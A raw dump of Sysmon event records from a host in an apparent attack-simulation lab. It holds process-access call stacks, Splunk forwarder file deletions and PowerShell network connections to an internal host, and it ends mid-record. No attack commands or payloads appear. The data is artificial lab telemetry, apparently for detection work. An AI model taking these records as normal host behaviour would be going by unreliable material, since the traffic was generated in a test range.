18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.055{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:01.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4143416D52F0F33852665FD58B41F99,SHA256=4D643682C0FA5AA7F82FAD8892376F1D837E4CD1C716121081A1F4CCA26679B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:02.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AE6CA0E46DEDD03D19D8E49FFD0480,SHA256=DDC70C605DA86ADDB9BBD4AAA3CDA999C943C841BC5E1C0E469DB432B7B4B6B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:27.142{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56636-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:02.157{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6199401B440E8C1C4EDDD322B695ACE,SHA256=C2609986ED3C0AFAC6236C186DC49A6ABB46DCFE4A5313F36926354259D75EA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:03.892{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54913D865734540C198E845C5FE24A75,SHA256=0A2E932924249042C4D7AE3AA1DE3C86FDA12036562FD2B51E0FCF25522B440B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:04.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B7E051604D54F0135324B70121F46E,SHA256=1392C094A0F2C80373718C0DEE245C4C145DA7FADBCA8901F02CF1A915607393,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56637-false10.0.1.12-8000- 23542300x800000000000000035084681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:05.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9CF8FF3C840E6019F857DE6C552838E,SHA256=55FCE15A56EFC4C0AC065E8807D7852DA7E39D77D5570F315B86781FF71FCF6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:06.975{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D261E3B813A290D1C84624CA1857F9F5,SHA256=F0F3EC946A525034CB0917FE1D3F81314634756BAAB5F25CABC1AC28783EDB9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:07.990{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7C6A3978C5BA2B757EA4FF066CB105,SHA256=8C3AAD5BB5340E351B71133805AD3F86D9B0DA90FCA92A9384A8CDD9EBCD3A1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:33.167{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56638-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:08.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=971C42AA85456FDC43BF6F5D73D2880E,SHA256=967111E1C04FAA4CBE32630C5BDF815C630A89B59816A4E376F8FFE9B71E195C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:09.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8591CB90DDE9821A5AA2B399CAED4D38,SHA256=7827CE9C10F944BA0128E66CD4BBDF0F8A8CCA0944DEEBE4A24177029EDA46AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:34.197{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56639-false10.0.1.12-8000- 23542300x800000000000000035084687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:10.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=510C45B33482CD64A53650D9ADE38907,SHA256=DC60745BC9EAE8331502DC13D7268BB3B50F4FDE8B660940D6484AF277C8AFF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:11.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5F144DD89F86B1184D7908D619D73C2,SHA256=0D8705362B84A5EA45A8D05F48A6CCB8D480DE1AC8B12289A710D95B5F08757C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:12.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E379782D7DE04578B3C7709FB7C012,SHA256=DE7A2A2D38BD69C8A35684D9486633910066525810009F7F9ECBE7678DDFFDEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.969{B81B27B7-4E7D-613A-4490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:38.190{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56640-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035084701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.453{B81B27B7-4E7D-613A-4390-03000000C801}53445416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 